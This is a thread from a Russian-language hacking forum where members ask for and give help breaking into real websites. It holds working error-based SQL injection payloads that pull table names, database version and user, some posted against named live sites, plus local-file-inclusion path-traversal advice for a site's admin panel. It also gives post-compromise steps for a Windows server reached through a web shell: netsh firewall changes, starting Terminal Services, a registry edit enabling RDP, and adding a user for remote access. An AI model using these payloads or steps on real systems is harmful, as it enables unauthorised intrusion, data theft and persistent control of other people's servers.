Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    178
    Likes Received:
    18
    Reputations:
    9
    нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей...
    инклужу ее...

    Вылазит форма добавления с actionом
    <FORM method=post name=AddNews action='/main.phtml?act=add' enctype='multipart/form-data'>

    поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку.
    меняю action на
    http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
    при добавление новости пишет "невозможно выполнить запрос".
    Что еще можно попробовать сделать?
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196
    скорей всего admnews.phtml инклюдит что-то еще, а так как ты инклюдишь этот скрипт с другой диры, то некоторые скрипты не подгружаются.
     
  3. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    323
    Likes Received:
    63
    Reputations:
    66
    При http://nora-m.ru/index/2/product/220 тоже вылазит ошибка, так что, скорее всего в скрипте отсутствует уязвимость.
    Пардон, ошибся.Пробуй blind инъекцию
     
    #17863 t3cHn0iD, 15 Sep 2011
    Last edited: 15 Sep 2011
  4. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    169
    Likes Received:
    9
    Reputations:
    6
    Пролез в бд но выдает все на непонятной кодировке..что можно сделать?
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196
    способ великолепен, спасибо, но к сожалению колонка subid INT, поэтому записать левак туда не удастся.


    P.S.

    попробовал
    1' or(1,2)=(select count(*),concat((select concat(table_name,0x3a,column_name) from information_schema.columns where table_schema !=0x696e666f726d6174696f6e5f736368656d61 limit 0,1),0x3a,floor(rand()*2)) from information_schema.columns group by 2 limit 0,1)+'

    уже лучше.

    MYSQL ERROR:
    Operand should contain 1 column(s)

    Можно же вывести через duplicate column ?

    P.P.S
    все решилось
    1'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)+and+'1

    спасибо FlaktW
     
    #17865 попугай, 15 Sep 2011
    Last edited: 15 Sep 2011
  6. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    109
    Likes Received:
    27
    Reputations:
    2
    @попугай
    если мы речь ведем про мускуль имеет место вот такое:
    insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')
    insert into TABLE (id, subid, date, data) values ('666', 'SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3','1','1')

    это так сказать в защиту моей теории :)
     
    2 people like this.
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196

    values ( скобкой не закрыта
     
  8. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    35
    Likes Received:
    12
    Reputations:
    7
    Code:
    http://www.gasniergicquel.com/customer/home.php?cat=2'and(select*from(select(name_const((select(concat_ws(0x3a,version(),user()))),1)),name_const((select(concat_ws(0x3a,version(),user()))),1))a)and'
     
    1 person likes this.
  9. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    228
    Likes Received:
    26
    Reputations:
    6
    sourcec0de, спасибо! Помоги и этим:
    HTML:
    http://www.proximeety.gr/member-321531[sql].html

    P.S. Сообщение не цитируйте, пожалуйста!
    P.P.S. Модеры, не удаляйте это сообщение!
     
    #17869 Kuteke, 17 Sep 2011
    Last edited: 17 Sep 2011
  10. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    487
    Likes Received:
    63
    Reputations:
    26
    Помогите скуль крутануть. Бред, не получается нихера = \
    _http://cs.hz.by/bans/ban_details_ex.php?bhid=16683
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Там нету скули. Пропускаются только цифровые значения.


    Специально буду цитировать твои сообщения, потому что ты поступаешь не по феншую.
     
    2 people like this.
  12. Ulitko

    Ulitko New Member

    Joined:
    12 Aug 2011
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается(
    вот код запуска, мб я что-то напутал?

    Code:
    netsh firewall set service remoteadmin enable
    netsh firewall set service remotedesktop enable
     
    #17872 Ulitko, 17 Sep 2011
    Last edited: 17 Sep 2011
  13. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    109
    Likes Received:
    27
    Reputations:
    2
    а по моему это все делается через net start
     
  14. rad_scorp

    rad_scorp New Member

    Joined:
    9 Sep 2011
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    Тебе нужно убедиться, что стандартный rdp порт для тебя будет открыт на фаере шлюза. Во-вторых, нужно добавить юзера, с которым заходишь, в группу remoteusers или как-то так. Ну и в-третьих, проще залить что-нибудь туда, что само даст мордочку, имхо, если есть возможность, конечно.
     
  15. rad_scorp

    rad_scorp New Member

    Joined:
    9 Sep 2011
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то:
    Code:
    DB Error: syntax error 
    SELECT login, password FROM emps WHERE login = '' or 1=1 --' 
    [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2] 
    а если 'admin' or "1"="1" /* то:
    Code:
     DB Error: unknown error
    SELECT login, password FROM emps WHERE login = 'admin' or "1"="1" /*' 
    [nativecode=144 ** Table './tradtyru/emps' is marked as crashed and last (automatic?) repair failed] 
    Скажите, я все правильно делаю и все правильно кто-то уже сделал до меня, зарегав пользователя "; DROP TABLE", или я чего-то не учитываю?

    P.S. не называю сайт, хочу сам расковырять, если возможно.
     
    #17875 rad_scorp, 17 Sep 2011
    Last edited: 18 Sep 2011
  16. Ulitko

    Ulitko New Member

    Joined:
    12 Aug 2011
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    насчет юзера, это все ясно. Через батник он добавляется спокойно. А насчет мордочки, можешь ченить поконкретнее посоветовать?
     
  17. rad_scorp

    rad_scorp New Member

    Joined:
    9 Sep 2011
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    Хм, что-то выдумать, кроме vnc, ничего не могу. Может, сообщество ау?

    А начни проще, у тебя порт слушается? netstat?
     
  18. Ulitko

    Ulitko New Member

    Joined:
    12 Aug 2011
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    введя нетстат, выдало дохрена подключений.
     
  19. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    109
    Likes Received:
    27
    Reputations:
    2
    дохрена подключений по rdp?
    ты уверен что служба рдп запущенна что бы ее открывать в фаерволе?
    просто даже если добавил пользователя и октрыл для нее порт в фаерволе а служба не запущенна хрен что у тебя получится!
    net start TermService
    как то так вроде.
    @rad_scorp
    судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.
    а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.
    у тебя какая версия?
     
  20. rad_scorp

    rad_scorp New Member

    Joined:
    9 Sep 2011
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    Хм. Да, не так все просто, как все сложно, но ман нетстата почитать неплохо бы.

    Держи:

    Code:
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    netstat -a -n | findstr "3389"
    
    Это разрешает соединения к терминальному серверу и затем удостоверяется, что сервис up and running. Это та самая галочка во вкладке свойств моего компьютера. В xp фаер вроде не мешает, если мешает - можно выключить. На 2008 (а значит, и, скорее всего, в 7) мы сталкивались с тем, что сервак увезли, а включить rdp забыли, и так просто туда не долезть. Тогда надо в реестре у фаера пару правил поправить, но сейчас не вспомню, если надо, в понедельник в личку пиши.

    Если слушающего порта не появилось, то я не нашел, как ТС включить без перезагрузки. У меня net start "Terminal Services" не работает.
     
Loading...
Thread Status:
Not open for further replies.